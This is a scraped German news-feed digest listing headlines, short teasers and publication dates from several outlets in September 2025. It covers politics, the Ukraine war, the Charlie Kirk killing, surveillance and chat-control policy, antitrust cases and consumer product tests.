Wasserdichte Kopfhörer im Test: Modelle von Shokz, Creative, Auvisio, Sony und JBL

Die Idee ist verlockend, mit Musik durchs Becken zu schwimmen. Man sollte aber wissen, was man von wasserfesten Headsets erwarten kann. Unser Test erklärt es.

Article link

Date of publish: Sat, 13 Sep 2025 07:35:00 +0200

Boris Becker: Lilly Becker möchte Unterhalt von Boris Becker erstreiten

Das dürfte die Freude von Boris Becker über sein neues Buch »Inside« schmälern: Seine Ex-Frau Lilly wirft ihm falsche Behauptungen vor und will Unterhalt für den gemeinsamen Sohn. Viel Unterhalt.

Article link

Date of publish: Fri, 12 Sep 2025 17:13:00 +0200

Goldene Henne: »Der Graf« fühlt sich beim Unheilig-Comeback »wie ein kleiner Junge«

Fast zehn Jahre nach seinem letzten Auftritt steht der Unheilig-Sänger wieder auf der Bühne. Nach einem Medley übermannen ihn Emotionen. Seiner Rückkehr ging ein Schicksalsschlag voraus.

Article link

Date of publish: Fri, 12 Sep 2025 23:55:00 +0200

Adipositas bei Kindern: Eine Forscherin erklärt, was wirklich hilft

Die Professorin Anna Lene Seidler untersucht, was Kinder weltweit vor Übergewicht bewahrt. Die Ergebnisse ihrer neuesten Studie überraschen.

Article link

Date of publish: Thu, 11 Sep 2025 12:46:00 +0200

Drohnen aus Russland über Polen: »Wir sollten uns nicht dümmer stellen, als wir sind«

Was haben die russischen Drohnen über Polen zu bedeuten? Sicherheitsexperte Nico Lange sieht einen gezielten Test des Kreml. Er sagt: »Die Schwächen der Nato-Luftverteidigung wurden überdeutlich.«

Article link

Date of publish: Thu, 11 Sep 2025 18:47:00 +0200

Boho-Chic: Diesen Gürtel tragen wieder alle

Der Boho-Gürtel feiert sein Comeback. Er half mir schon in meiner Pubertät, mich anzuschnallen. Jetzt ist er zurück. Endlich!

Article link

Date of publish: Sun, 7 Sep 2025 16:55:00 +0200

Fotobücher im Test: Cewe, PosterXXL, MeinFoto, Lidl, Saal und Whitewall

Ein Buch aus eigenen Fotos kann eine schöne Erinnerung oder ein Geschenk sein. Doch welcher Anbieter liefert die beste Qualität? Wo gelingt die Gestaltung besonders leicht? Wir haben es bei sechs Anbietern getestet.

Article link

Date of publish: Sun, 31 Aug 2025 09:39:00 +0200

Rätsel des Alltags: Warum haben Tiger Streifen und Leoparden Flecken?

Sowohl Tiger als auch Leoparden schleichen sich bei der Jagd an ihre Beute heran. Doch während die eine Raubkatze dies im Streifen-Look tut, setzt die andere auf Fleckenmuster. Wie kommt das? DEIN SPIEGEL erklärt’s.

Article link

Date of publish: Sat, 30 Aug 2025 15:48:00 +0200

Nachrichten - WELT

Ermittler rekonstruieren Details des tödlichen Parkplatz-Streits von Niedernhall

Ein zwölf Jahre altes Kind stirbt nach einem Streit auf dem Parkplatz eines Supermarkts in Baden-Württemberg. Was über den Hergang bekannt ist und welche Fragen für die Ermittler noch offen sind.

Article link

Date of publish: Sat, 13 Sep 2025 06:56:18 GMT

Neuer Anlauf zur Wahl der Verfassungsrichter – SPD schickt neue Kandidatin ins Rennen

Der Bundestag unternimmt einen neuen Anlauf zur Wahl von drei Verfassungsrichtern. Am 25. September soll der Bundestag wählen. Zuvor muss der Wahlausschuss die neue SPD-Kandidatin Sigrid Emmenegger billigen. Die Wahl erfordert eine Zwei-Drittel-Mehrheit.

Article link

Date of publish: Sat, 13 Sep 2025 06:55:20 GMT

„Habeck konnte froh sein, dass der BND einen Ausweg aus dem Dilemma aufzeigen konnte“

Als Putin den Gashahn zudrehte, zeigte der BND dem zögerlichen Wirtschaftsminister Habeck Wege aus der Krise. Ohne die Agenten wäre Deutschland kalt geblieben. Ex-Kanzler Scholz lobt den Dienst – Habeck dankt auf seine eigene Weise.

Article link

Date of publish: Sat, 13 Sep 2025 06:38:40 GMT

„Druck ist ein Privileg. Man muss schon ein echt harter Hund sein“

Stabhochspringer Armand Duplantis schwebt von Weltrekord zu Weltrekord. Seine Sportart sei für den Schweden „ein Wettbewerb mit mir selbst“, sagt er. Ein Gespräch über den Druck als Alleinunterhalter – und eine zweite Leidenschaft.

Article link

Date of publish: Sat, 13 Sep 2025 06:26:26 GMT

Kreml-Soldaten sollen durch Gasrohre in die Stadt gekrochen sein

Russland soll in Kupjansk durch unterirdische Gasröhren eingedrungen sein, um ukrainische Stellungen zu umgehen und die Stadt zu erobern, berichtet ein ukrainisches Portal. Reporter Christoph Wanner ordnet die Gerüchte ein.

Article link

Date of publish: Sat, 13 Sep 2025 06:07:25 GMT

Prinz Harry besucht die Ukraine – er möchte sich um verwundete Soldaten kümmern

Die Nato will nach dem Eindringen russischer Drohnen in den polnischen Luftraum ihre Ostflanke verstärken. Der Einsatz starte „sofort“. Unterdessen besucht der britische Prinz die Ukraine – aus einem speziellen Grund. Mehr im Liveticker.

Article link

Date of publish: Sat, 13 Sep 2025 06:06:00 GMT

Liebe LGBTQ – geht es ein wenig leiser?

Es ist kaum noch auszuhalten, in welcher Wucht man täglich mit LGBTQ-Themen belämmert wird – vom grammatikalischen Firlefanz des Genderns bis zu queeren Lebensgemeinschaften in jeder zweiten Vorabendserie.

Article link

Date of publish: Sat, 13 Sep 2025 05:58:42 GMT

„Du hast keine Ahnung, was du entfesselt hast. Welches Feuer du entzündet hast“

Nach dem Mord an ihrem Ehemann, dem konservativen Aktivisten Charlie Kirk, hat seine Witwe Erika Kirk eine emotionale Kampfansage an den mutmaßlichen Täter gerichtet. Herbert Bauernebel berichtet über ihren Auftritt und die Lage im US-Bundesstaat Utah.

Article link

Date of publish: Sat, 13 Sep 2025 05:38:36 GMT

Seine Leiche blieb in der Mongolei, sein Kopf in Moskau

War es ein Putsch-Versuch, ein Mordkomplott oder ein üblicher Machtkampf? Im September 1971 stürzte Maos Stellvertreter Lin Biao über der Mongolei ab. An der Affäre während der Kulturrevolution scheiden sich noch immer die Geister.

Article link

Date of publish: Sat, 13 Sep 2025 05:34:02 GMT

Das Beispiel Stuttgart offenbart das große Scheitern der Wärmewende

Das Interesse an Wärmepumpen in der Bevölkerung bleibt hinter den Erwartungen zurück. Das zeigen neue Studien. Dennoch will die Politik in vielen Orten an ihren Klima-Zielen festhalten. Auch „erhebliche Einschränkungen“ scheinen nicht genug, um daran etwas zu ändern.

Article link

Date of publish: Sat, 13 Sep 2025 05:25:29 GMT

10 Zitate aus berühmten Reden – Experten kennen 8

Reden ist Silber, Schweigen ist Gold? Diese Phrase können wir für unser heutiges Quiz mal gepflegt über Bord werfen. Denn es gibt Ansprachen, die sind untrennbar verknüpft mit den Personen, die sie gehalten haben.

Article link

Date of publish: Sat, 13 Sep 2025 05:23:46 GMT

„Wir sind bereit zu leiden – aber nur im Fitnessstudio“

Der Kapuzinermönch Paulus Terwitte hat sich zu einem Leben in Armut verpflichtet. Im Gespräch mit WELT erklärt er, warum dieser Weg zu mehr Glück führen kann als das Streben nach Erfolg – und was sich daraus auch für Gesellschaft und Karriere lernen lässt.

Article link

Date of publish: Sat, 13 Sep 2025 05:22:58 GMT

Umbrien ist die stille Alternative zur Toskana

Umbrien ist eine bodenständige Region in der Mitte Italiens. Die Küche ist ausgezeichnet, die Hotels sind stilvoll, die Landschaften wie gemalt. Vom Massentourismus ist die Gegend verschont geblieben. Und Trüffel-Pasta gibt es zum Schnäppchenpreis.

Article link

Date of publish: Sat, 13 Sep 2025 05:20:10 GMT

Dieses Team bimst uns mit dem Holzhammer ein, was Mannschaftssport ausmacht

Die deutschen Nationalteams im Basketball und Fußball verfügen über ähnliche Potenziale. Während die einen Weltspitze sind, stecken die anderen in der Krise. Der DFB muss von Wagner, Schröder und Co. lernen, worauf es ankommt, um erfolgreich zu sein.

Article link

Date of publish: Sat, 13 Sep 2025 05:14:33 GMT

„Westen scheitert eher an einem falschen Freiheitsbegriff als an äußeren Gegnern“

Im Westen steht nicht weniger als „unsere Art zu leben“ auf dem Spiel, sagt Verfassungsrechtler Di Fabio. Die Deutschen müssten wieder lernen, für ihre Gesellschaft einzustehen – das könne auch mit einer Wehrpflicht einhergehen. Er rügt, dass eine mutlose Mitte „Sinnfragen“ den Rändern überlasse.

Article link

Date of publish: Sat, 13 Sep 2025 04:57:47 GMT

Nach Erdbeben der Stärke 7,4 schwere Tsunami-Warnung im Osten Russlands

Vor der russischen Ostküste hat es erneut ein schweres Erdbeben der Stärke 7,4 gegeben. Die Behörden gaben für die Region eine Tsunami-Warnung in einem Radius von 300 Kilometern heraus.

Article link

Date of publish: Sat, 13 Sep 2025 03:40:16 GMT

Spahns Kritik an Vermögensverteilung erhält große Zustimmung – „Es werden Milliarden verschenkt“

In das Thema Erbschaftssteuer kommt Bewegung. Nachdem CDU-Fraktionschef Jens Spahn erstmals eine Privilegierung Vermögender eingeräumt hat, bekommt er nun positive Resonanz aus dem eigenen Lager.

Article link

Date of publish: Sat, 13 Sep 2025 03:01:52 GMT

So reagiert Julia Klöckner auf die Kritik der ehemaligen Grünen-Spitze

Bundestagspräsidentin Julia Klöckner reagiert auf die Kritik ehemaliger Spitzenpolitiker der Grünen. „Jeder sollte ertragen können, dass es Menschen gibt, die nicht eins zu eins die eigenen Ansichten teilen“, sagte Klöckner.

Article link

Date of publish: Sat, 13 Sep 2025 02:19:21 GMT

Rede seiner Frau – „Die Schreie dieser Witwe werden wie ein Schlachtruf um die Welt hallen“

Nur zwei Tage nach dem Tod ihres Mannes hielt Erika Kirk eine hochemotionale Rede. Sie werde dafür sorgen, dass niemand den Namen Charlie Kirk vergessen werde, sagte die ehemalige Miss Arizona. Er trage die Krone eines Märtyrers.

Article link

Date of publish: Sat, 13 Sep 2025 01:14:39 GMT

Trump-Regierung schafft Programm zur Kontrolle des CO2-Ausstoßes ab

Einmal mehr macht die Trump-Regierung deutlich, wie unwichtig ihr der Umweltschutz ist. Nun wird ein 2010 beschlossenes Programm beendet und der Industrie damit alle Freiheiten in Sachen CO2-Ausstoß überlassen.

Article link

Date of publish: Sat, 13 Sep 2025 00:50:16 GMT

Das ist die Merz-Regierung – Mehr Wirtschaft, mehr Männer, noch weniger Ostdeutsche

Das Spitzenpersonal des schwarz-roten Bündnisses unterscheidet sich deutlich von dem der Ampel. Sehr viel mehr Minister und Staatssekretäre arbeiteten schon einmal außerhalb der Politik. Es gibt weniger Frauen, aber mehr Juristen. Eine Uni-Stadt dominiert.

Article link

Date of publish: Fri, 12 Sep 2025 23:16:45 GMT

Russland braucht Prothesen — und Deutschland liefert Rekordmengen

Medizintechnische Produkte sind von den Sanktionen gegen Russland weitgehend ausgenommen. Dies machen sich deutsche Hersteller offenbar zunutze. Der Export von Prothesen und künstlichen Gelenken in das Kriegsland boomt.

Article link

Date of publish: Fri, 12 Sep 2025 23:12:17 GMT

Wenn der CEO nicht mehr gehen muss

Vorstandsvorsitzende bleiben länger auf ihren Posten als früher. Das zeigt eine neue Studie, die WELT exklusiv vorliegt. Die Suche nach Kontinuität auf den Spitzenposten in Unternehmen war demnach selten so groß wie heute. Für die längere Verweildauer von CEOs gibt es gute Gründe.

Article link

Date of publish: Fri, 12 Sep 2025 23:10:23 GMT

Trump trifft Katars Regierungschef zum Abendessen – Rubio reist für operative Gespräche nach Israel

US-Präsident Donald Trump empfängt Katars Regierungschef in seinem Golfclub in New Jersey. Unterdessen reist Außenminister Marco Rubio am Wochenende nach Israel, um über gemeinsame operative Schritte zu sprechen.

Article link

Date of publish: Fri, 12 Sep 2025 23:02:51 GMT

Vergebung oder Rache – Welche Lehre Trump und andere Republikaner aus dem Mord ziehen

Nach der Tat von Utah fürchten viele mehr politische Gewalt. Prominente Republikaner appellieren an alle politischen Lager, Charlie Kirks Prinzip des Dialogs zu leben. Für den US-Präsidenten ist klar, dass nur eine Seite die Verantwortung für die Eskalation trägt.

Article link

Date of publish: Fri, 12 Sep 2025 22:34:55 GMT

Israelis sagen für Schachturnier in Spanien ab – Präsident des Klubs reagiert erleichtert

Nach Kritik am Vorgehen Israels im Gazastreifen ziehen sieben israelische Schachspieler ihre Teilnahme an einem Turnier in Spanien zurück. Der Präsident des Schachklubs begrüßt die Entscheidung. Was hinter dem Schritt steckt.

Article link

Date of publish: Fri, 12 Sep 2025 21:59:41 GMT

Wahl der neuen Verfassungsrichter soll am 25. September stattfinden

Im Juli scheiterte die Koalition bei dem Versuch, zwei neue Richterinnen und einen Richter für Karlsruhe zu bestimmen. Mit einer neuen SPD-Kandidatin soll es laut einem Bericht Ende des Monats einen neuen Anlauf geben.

Article link

Date of publish: Fri, 12 Sep 2025 20:41:22 GMT

Große Halbfinal-Show der Türkei – Deutschlands Endspielgegner steht fest

Die deutschen Basketballer spielen gegen die Türkei um den EM-Titel. Die Türken haben sich im Halbfinale überraschend deutlich gegen Griechenland durchgesetzt. Die Highlights des zweiten Halbfinals im Video.

Article link

Date of publish: Fri, 12 Sep 2025 20:38:29 GMT

Bosbach löscht Beitrag über erschossenen US-Aktivisten Charlie Kirk

In einer ersten Reaktion hatte die CDU-Politikerin Bosbach den getöteten Aktivisten Charlie Kirk als eine der „einflussreichsten jungen konservativen Stimmen weltweit“ gelobt. Nach Kritik an ihrer Würdigung löscht sie ihren Instagram-Post – und begründet ihre Entscheidung.

Article link

Date of publish: Fri, 12 Sep 2025 19:32:26 GMT

Paderborn schockt den VfL Bochum in der 90. Minute

Der VfL Bochum ist zum vierten Mal in Folge sieglos geblieben. Am Geburtstag von Trainer Dieter Hecking gab es in der Schlussminute sogar noch den Nackenschlag. In Bielefeld brachten Magdeburgs Fans die eigene Mannschaft aus dem Konzept.

Article link

Date of publish: Fri, 12 Sep 2025 19:21:49 GMT

Nachrichten: DIE ZEIT Newsfeed

Bundestagspräsidentin: Julia Klöckner weist Kritik an ihrer Amtsführung zurück

Grünen-Politiker hatten Julia Klöckner zuletzt gezielte Polarisierung vorgeworfen. Die Bundestagspräsidentin weist das zurück – und empfiehlt der Opposition mehr "Würde".

Article link

Date of publish: Sat, 13 Sep 2025 06:56:42 -0000

Proteste in Nepal: Nepals Präsident löst Parlament auf und setzt Neuwahlen an

Nach den gewaltsamen Protesten in Nepal hat Präsident Ramchandra Paudel das Parlament aufgelöst. Für den 5. März setzte er Neuwahlen in dem von Unruhen geprägten Land an.

Article link

Date of publish: Sat, 13 Sep 2025 06:43:19 -0000

Leichtathletik-WM in Tokio: Platz 46 sollte drin sein

In Tokio kämpfen die besten Leichtathleten um Gold. Nach der Nullnummer vom letzten Mal stehen die Chancen auf deutsche Medaillen gut – selbst da, wo man es nicht wartet.

Article link

Date of publish: Sat, 13 Sep 2025 05:47:18 -0000

Tod von Charlie Kirk: Witwe von Charlie Kirk kündigt Fortführung seiner Bewegung an

Nach dem Attentat auf den ultrarechten Aktivisten Charlie Kirk in den USA spricht seine Witwe erstmals öffentlich. Erika Kirk will die Arbeit ihres Mannes fortsetzen.

Article link

Date of publish: Sat, 13 Sep 2025 05:45:39 -0000

Demonstration für Gaza: Was Sahra Wagenknecht mit Didi Hallervorden und Roger Waters verbindet

Sahra Wagenknecht ruft zu einer Solidaritätsdemo für Gaza auf. Was ist davon zu erwarten? Und: Warum Frauen in Kliniken häufiger an Herzinfarkten sterben.

Article link

Date of publish: Sat, 13 Sep 2025 04:00:11 -0000

Bürgerkrieg im Sudan: USA und arabische Länder fordern Waffenruhe im Sudan

Die USA, Saudi-Arabien, die Vereinigten Arabischen Emirate und Ägypten wollen den Bürgerkrieg im Sudan beenden. Sie legten einen mehrstufigen Plan vor.

Article link

Date of publish: Sat, 13 Sep 2025 03:56:01 -0000

Syrien: Syrien verhandelt laut Al-Scharaa mit Israel über Truppenabzug

Seit Dezember hält Israel die Golan-Pufferzone im Südwesten Syriens besetzt. Jetzt laufen Syriens Übergangspräsidenten zufolge Gespräche über einen Rückzug der Truppen.

Article link

Date of publish: Sat, 13 Sep 2025 03:03:16 -0000

Sushila Karki: Nepal wird nach Protesten erstmals von einer Frau regiert

Nach Protesten mit vielen Toten und dem Rücktritt des Ministerpräsidenten leitet Sushila Karki Nepals Regierung. Sie und ihr Kabinett sind übergangsweise im Amt.

Article link

Date of publish: Sat, 13 Sep 2025 02:35:54 -0000

Frankreich: Ratingagentur stuft Frankreichs Kreditwürdigkeit herab

Nach dem Regierungswechsel in Frankreich wurde mit einer Reaktion auf den Finanzmärkten gerechnet. Jetzt bewertete Fitch die Kreditwürdigkeit des Landes nur noch mit A+.

Article link

Date of publish: Sat, 13 Sep 2025 01:16:49 -0000

Bundesverfassungsgericht: Verfassungsrichterwahl für den 25. September geplant

Im Juli scheiterte die Koalition, die Richterstellen am Verfassungsgericht zu besetzen. Ende des Monats soll es mit einer anderen SPD-Kandidatin einen neuen Anlauf geben.

Article link

Date of publish: Sat, 13 Sep 2025 01:07:09 -0000

Klimaschutz: Treibhausgasemissionen sollen in den USA nicht mehr gemeldet werden

Kraftwerke und Fabriken in den USA müssen ihre Emissionen melden. Die Umweltbehörde sieht darin eine zu hohe Belastung und will die Meldepflicht für Tausende abschaffen.

Article link

Date of publish: Fri, 12 Sep 2025 23:49:50 -0000

Krieg gegen die Ukraine: USA wollen "jeden Zentimeter des Nato-Territoriums" verteidigen

Angesichts der Drohnen über Polen haben die USA den Nato-Verbündeten Unterstützung zugesagt. Die G7-Finanzminister erwägen Zölle gegen Russlandunterstützer. Das Liveblog

Article link

Date of publish: Fri, 12 Sep 2025 23:44:51 -0000

Chicago: ICE-Beamter erschießt Autofahrer bei Kontrolle in Vorort von Chicago

Bei einer Fahrzeugkontrolle während einer "Blitz"-Aktion gegen Einwanderer wurde ein Mann getötet. Das Ministerium spricht von "angemessener Gewaltanwendung".

Article link

Date of publish: Fri, 12 Sep 2025 22:47:59 -0000

Krieg in Gaza: Außenminister fordern Ende der israelischen Angriffe auf Gaza-Stadt

Deutschland, Frankreich und Großbritannien haben zum Waffenstillstand in Gaza aufgerufen. Donald Trump will nach israelischem Angriff Katars Premier treffen. Das Liveblog

Article link

Date of publish: Fri, 12 Sep 2025 22:38:55 -0000

Bundesliga, 3. Spieltag – Freitag: Leverkusen gewinnt in doppelter Unterzahl gegen Eintracht Frankfurt

Der dritte Spieltag startete turbulent. Die Leverkusener trafen nach Freistößen und Elfmeter, kassierten aber auch zwei gelb-rote Karten gegen Frankfurt. Der Spielbericht

Article link

Date of publish: Fri, 12 Sep 2025 20:41:59 -0000

netzpolitik.org

Chatkontrolle: Noch hält sich Widerstand

Innenminister Dobrindt und Justizministerin Hubig stehen nebeneinander im Gespräch.
Auf sie beide kommt es wesentlich an, wenn es um die deutsche Position zur Chatkontrolle geht: Innenminister Dobrindt (CSU) und Justizministerin Hubig (SPD). – Alle Rechte vorbehalten IMAGO / Political-Moments
Derzeit ist eine Einigung zur Chatkontrolle auf Ebene der EU-Mitgliedstaaten im Rat noch nicht absehbar. Doch ob etwa die Ablehnung aus Deutschland zum massenhaften Scannen privater Kommunikation weiter hält, ist ungewiss. Das hat auch eine Sitzung des Digitalausschusses im Bundestag gezeigt.

Article link

Date of publish: Fri, 12 Sep 2025 14:23:07 +0000

Gut für alle: Gemeinwohlorientierter Journalismus braucht Rechtssicherheit

Grafitti auf einem Rolladen: Mann mit Brille gibt Frau eine Zeitung.
Gemeinwohlorientierter Journalismus hat bei der Union keinen guten Stand. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Claudio Schwarz
Die Bundesregierung will E-Sport gemeinnützig machen. Das ist richtig. Gemeinwohlorientierter Journalismus hingegen muss weiter mit Unsicherheiten rechnen. Das wird sich mit dieser Union auch kaum ändern – obwohl es gerade jetzt bitter nötig wäre. Ein Kommentar.

Article link

Date of publish: Thu, 11 Sep 2025 16:10:04 +0000

Überwachungssoftware: Mehr als zwei Drittel lehnen Palantir ab

Mensch hält Plakat mit der Aufschrift "Peter Thiel = Big Brother"
Protest gegen Palantir in New York im August. Der Konzern rund um Peter Thiel ist auch in die Deportationen in den USA verwickelt. – Alle Rechte vorbehalten IMAGO / ZUMA Press Wire
Geht es um polizeiliche Big-Data-Software und Datenanalyse, fällt immer wieder der Name Palantir. Wie eine aktuelle Umfrage zeigt, sehen Menschen über Parteigrenzen hinweg die Einführung von Überwachungssoftware des US-Konzerns mehrheitlich kritisch.

Article link

Date of publish: Thu, 11 Sep 2025 14:11:06 +0000

Amnesty-Bericht: Pakistan überwacht Bevölkerung mit deutscher Technologie

Eine Person mit einem Tuch auf dem Kopf läuft vor einem bunten Mauergemälde. Auf der Mauer liegt NATO-Stacheldraht.
Vor Telefonüberwachung und Internetzensur ist in Pakistan niemand mehr sicher. – Alle Rechte vorbehalten IMAGO / Anadolu Agency
Pakistan hat laut Amnesty International eines der umfangreichsten staatlichen Überwachungssysteme außerhalb Chinas aufgebaut. Zulieferer neuester Technologie zur Überwachung und Zensur sind auch europäische und deutsche Unternehmen wie Thales und Utimaco.

Article link

Date of publish: Thu, 11 Sep 2025 11:21:47 +0000

Druck auf Bundesregierung: Schleswig-Holstein drängt auf Digitalabgabe

Zähe Debatte um faire Besteuerung großer Digitalkonzerne: Dirk Schrödter (CDU), Chef der schleswig-holsteinischen Staatskanzlei, versucht sein Glück mit einer Initiative im Bundesrat. (Symbolbild) – Alle Rechte vorbehalten IMAGO / Frank Peter
Zuletzt ist es still um eine Digitalsteuer in Deutschland geworden. Nun könnte ein Vorstoß von Schleswig-Holstein der Debatte neues Leben einhauchen.

Article link

Date of publish: Wed, 10 Sep 2025 13:59:28 +0000

Datenschutzreform: Kommt der Kahlschlag?

Foto einer Axt auf einem Holzklotz, im Hintergrund karge Landschaft und dunkle Wolken
Die Regierung könnte die Axt an die föderale Datenschutzstruktur legen. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Jason Abdilla
Schwarz-Rot hat weitreichende Reformen beim Datenschutz angekündigt. "Im Sinne der Wirtschaft" soll unter anderem die Aufsicht neu geregelt werden. Inzwischen liegen zahlreiche konkrete Vorschläge vor, unter anderem von SPD und Landesdatenschützer:innenn, nur die Union gibt sich verschlossen.

Article link

Date of publish: Wed, 10 Sep 2025 11:51:15 +0000

Alaa Abd el-Fattah: Ägyptens Präsident prüft Begnadigung von berühmtem Blogger

Alaa Abd el-Fattah, hinter ihm Demonstrierende
Alaa Abd el-Fattah im Juni 2011 auf dem Tahrir-Platz in Kairo. CC-BY 2.0 Lilian Wagdy
Einen großen Teil seines Lebens verbrachte der Blogger und Aktivist Alaa Abd el-Fattah im Gefängnis. Nun könnte die Symbolfigur der ägyptischen Demokratiebewegung endlich freikommen.

Article link

Date of publish: Wed, 10 Sep 2025 07:14:58 +0000

Offener Brief: Hunderte Wissenschaftler:innen stellen sich gegen Chatkontrolle

Auge schaut auf Smartphone. Prompt: a chat on a smartphone, surveillance eye looking at smartphone, black outlines -
Kommt die Chatkontrolle, gibt es keine sichere verschlüsselte Kommunikation mehr. (Symbolbild) – Public Domain generiert mit Midjourney
Renommierte Forscher:innen erinnern die Mitglieder des EU-Parlaments und des EU-Rates daran, dass die Chatkontrolle „beispiellose Möglichkeiten für Überwachung, Kontrolle und Zensur“ bieten würde. Sie fordern, die Ursachen von sexualisierter Gewalt an Kindern zu bekämpfen statt Hunderte Millionen Menschen zu überwachen.

Article link

Date of publish: Tue, 09 Sep 2025 12:22:05 +0000

Online-Werbung: Die EU muss Google aufspalten

Zerbrochenes Handydisplay, darunter ist ein Google-Logo zu sehen.
Zerschlagung wäre eine Lösung (Symbolbild) – Alle Rechte vorbehalten IMAGO / NurPhoto
Die EU-Kommission zwingt Google zunächst noch nicht dazu, Teile seines Werbegeschäfts zu verkaufen. Der Konzern muss zwar eine Strafe von 2,95 Milliarden Euro zahlen. Aber ob es zu einer Aufspaltung kommt, ist offen. Dabei kann nur sie die Interessenkonflikte Googles und seinen Machtmissbrauch dauerhaft beenden.

Article link

Date of publish: Mon, 08 Sep 2025 14:30:46 +0000

Fußfessel für Gewaltschutz: „Es gibt nur schlechte Optionen. Wir sollten sie alle umsetzen.“

Beine in Jeans und Turnschuhen, an einem Knöchel ist eine elektronische Fußfessel befestigt
Die elektronischen Fußfessel für den Gewaltschutz haben SPD und CDU schon im Koalitionsvertrag vereinbart. – Alle Rechte vorbehalten IMAGO / brennweiteffm
In Spanien gilt sie als Erfolg, jetzt kommt sie auch in Deutschland: Die elektronische Fußfessel für Gewalttäter*innen soll Opfer von Partnerschaftsgewalt schützen. Doch Kriminologe Florian Rebmann warnt im Interview: In vielen Fällen hilft sie nicht – und könnte die eigentlichen Probleme verdecken.

Article link

Date of publish: Mon, 08 Sep 2025 11:51:41 +0000

Trugbild: Plastik, Parasiten und Paranoia

Ein düsteres Gemälde zeigt eine Insel, ein Boot, darauf ein Mann nur mit Lendenschurz bekleidet, der prophetisch die Arme hebt.
Auch Promis müssen sterben. – Public Domain Vincent Först mit ChatGPT
Wir sind voller Schadstoffe und Gewürm. Das sagen Model-Mama Heidi Klum und „Langlebigkeits-Influencer“ Bryan Johnson. Dabei tragen die Promis selbst zur allgemeinen Vergiftung bei.

Article link

Date of publish: Sun, 07 Sep 2025 07:30:30 +0000

KW 36: Die Woche, in der wir ordentlich gewachsen sind

– Fraktal, generiert mit MandelBrowser von Tomasz Śmigielski
Die 36. Kalenderwoche geht zu Ende. Wir haben 14 neue Texte mit insgesamt 94.578 Zeichen veröffentlicht. Willkommen zum netzpolitischen Wochenrückblick.

Article link

Date of publish: Sat, 06 Sep 2025 07:15:25 +0000

#299 Off The Record: Wie unsere jüngsten Team-Mitglieder auf unsere Arbeit und Soziale Medien blicken

Drei Menschen mit großen Kopfhörern lächeln in die Kamera
Ingo, Karoline und Lilly bei der Arbeit
Die Prakti-Ausgabe unseres Podcasts ist wieder da! Diesmal mit unserer Praktikantin Karoline und unserer bisherigen Bundesfreiwilligen Lilly. Wir sprechen über gemeisterte Herausforderungen, die Bedeutung von Social Media und über ihre Erfahrungen in einem alternden Team.

Article link

Date of publish: Sat, 06 Sep 2025 04:00:01 +0000

Zivilgesellschaft: Familienministerin will Demokratieprojekte mit Verfassungsschutz durchleuchten

Karin Prien stützt Gesicht in Hand und schaut kritisch
Möchte zivilgesellschaftliche Projekte „breit angelegt“ überprüfen: Bundesfamilienministerin Karin Prien (CDU) – Alle Rechte vorbehalten IMAGO / Jürgen Heinrich
Seit langem blasen rechte Akteure zum Angriff auf die Zivilgesellschaft. Nun verspricht Familienministerin Prien in einem Brief an die Union, dass Nichtregierungsorganisationen im Programm "Demokratie leben" einer "breit angelegten Verfassungsschutzprüfung" unterzogen würden. Wie viele Organisationen durchleuchtet werden, will das Ministerium nicht verraten.

Article link

Date of publish: Fri, 05 Sep 2025 16:23:24 +0000

Transparenzbericht 2. Quartal 2025: Unsere Einnahmen und Ausgaben und mehr Reichweite

Ein impressionistisches Gemälde, das eine grüne Küstenlandschaft mit Menschen zeigt
In die weite Ferne richtet sich der Blick. – Public Domain William Merritt Chase – Landscape – Shinnecock, Long Island
Unser Projekt Reichweite nimmt Form an. Dafür sind auch neue Menschen ins Team gekommen. Wir freuen uns gemeinsam mit ihnen auf das, was kommt. Und zappen häufiger zum Kinderkanal.

Article link

Date of publish: Fri, 05 Sep 2025 13:37:08 +0000

Berichte über Überwachung in Gaza: Microsoft entlässt Mitarbeitende nach Protesten

Drei Männer sitzen auf einer Bühne vor himmelblauem Hintergrund, auf dem eine große bunte Zahl 50 prangt.
Microsoft-Mitgründer Bill Gates, der ehemalige Microsoft-CEO Steve Ballmer und der amtierende CEO Satya Nadella (von links nach rechts) während der Feierlichkeiten zu Microsofts 50. Geburtstag im April dieses Jahres. – Alle Rechte vorbehalten IMAGO / Agencia EFE
Seit Monaten protestieren Microsoft-Mitarbeitende in den USA dagegen, dass ihr Unternehmen Geschäftsbeziehungen zum israelischen Militär und der israelischen Regierung unterhält. Microsoft hat einige demonstrierende Angestellte entlassen. Zugleich will das Unternehmen prüfen, ob israelische Streitkräfte die Azure-Plattform zur Überwachung von Palästinenser:innen nutzen.

Article link

Date of publish: Thu, 04 Sep 2025 12:41:32 +0000

Hessisches Psychisch-Kranken-Hilfegesetz: „Aus einem Genesungsschritt wird ein Sicherheitsrisiko gemacht“

Eine offene Tür steht mitten in der Natur, durch die Öffnung sieht man eine Hügellandschaft.
Nach der Entlassung aus einer Klinik sollte der Weg zur Genesung führen, nicht zur Polizei. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Tür: choose your stories, Hügel: Claudio Testa
Wenn eine Person nach ihrer unfreiwilligen Einweisung in eine psychiatrische Klinik wieder entlassen wird, soll darüber in Hessen künftig in manchen Fällen die Polizei informiert werden. Expert:innen warnen vor Stigmatisierung und Datenschutzproblemen.

Article link

Date of publish: Thu, 04 Sep 2025 09:28:46 +0000

Vorratsdatenspeicherung: Sag deine Meinung zur Massenüberwachung

Die EU-Kommission mit ihren 27 Mitgliedern.
Die EU-Kommission mit ihren 27 Mitgliedern. CC-BY 4.0 Europäische Kommission
Die EU-Initiative für eine neue Vorratsdatenspeicherung ist auf dem Weg. Die EU-Kommission fragt in einer öffentlichen Konsultation nach eurer Meinung. Wollt ihr verhindern, dass Metadaten aller Menschen ohne Anlass europaweit gespeichert werden? Dann bringt euch ein.

Article link

Date of publish: Wed, 03 Sep 2025 15:59:21 +0000

US-Kartellverfahren: Monopolist Google kommt ungeschoren davon

Google kann seinen Browser Chrome behalten, der Konzern wird nicht zerschlagen. – Alle Rechte vorbehalten IMAGO / ABACAPRESS
Google sei ein Monopolist, hat ein US-Richter im vergangenen Jahr entschieden. Spürbare Konsequenzen folgen daraus jedoch nicht: Eine von vielen erwartete Zerschlagung des Werbekonzerns bleibt aus.

Article link

Date of publish: Wed, 03 Sep 2025 14:48:07 +0000

Trotz Trump: EU-Gericht gibt grünes Licht für transatlantischen Datenverkehr

Der US-Präsident in blauem Anzug mit roter Krawatte vor einem großen Publikum
US-Präsident Donald Trump ist nicht als Garant des Rechtsstaates bekannt CC-BY-SA 2.0 Gage Skidmore
